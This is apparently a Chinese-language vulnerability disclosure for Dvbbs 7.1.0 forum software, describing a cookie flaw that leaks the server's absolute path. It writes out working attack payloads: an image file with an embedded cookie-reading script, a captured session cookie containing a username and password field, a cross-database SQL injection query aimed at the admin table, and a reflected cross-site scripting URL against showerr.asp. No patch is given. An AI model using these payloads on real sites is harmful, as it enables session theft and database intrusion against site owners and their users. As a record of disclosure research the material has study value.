漏洞發(fā)現(xiàn)：LiNZI[B.C.T]@www.cnbct.org 
廠商名字：動網(wǎng)先鋒論談 
廠商地址：http://www.dvbbs.net/ 
漏洞程序：Dvbbs 7.1.0 
漏洞描述: 
Dvbbs 7.1.0 的Cookie存在泄露站點的絕對路徑的漏洞，攻擊者可以配合其它技術，實現(xiàn)SQL跨庫查詢等。 
漏洞利用例子: 
一、泄露絕對漏洞測試: 
對官方的測試站點:bbs.dvbbs.net 
上傳一張圖，代碼如下: 
GIF89a 
<script>alert(document.cookie)</script> 
抓包得到cookie如下 
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs= 
分析cookie可以得到站點的絕對路徑如下: 
d:\\web\\dvbbs7為論談的絕對路徑 
二、攻擊延伸: 
www.host.com 
主程序存在sql注入漏洞，但是找不到表名和字段名。 
注入點假設: 
www.host.com\\linzi.asp?fuck=you 
論談為dvbbs 7.1.0 ，數(shù)據(jù)庫為data\\\\dvbbs.asp，做了防下載處理. 
利用上面的動網(wǎng)暴路徑，抓包得到絕對路徑為 d:\\www\\dvbbs\\data\\dvbbs.asp 
實現(xiàn)跨庫查詢如下: 
www.host.com\\linzi.asp?fuck=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp") 
官方補丁: 
尚無 

測試方法可以有所改變,只需要用戶得到目標網(wǎng)站的COOKIE信息就可以了.不需要是BBS的用戶的情況下,請大家使用以下方法: 
http://www.target.com/bbs/showerr.asp?BoardID=0&ErrCodes=60,60&action=<script>alert(document.cookie)</script> 
因為動網(wǎng)的showerr.asp頁面過濾不嚴導致了跨站的效果產生,雖然無傷大雅!! 

最新評論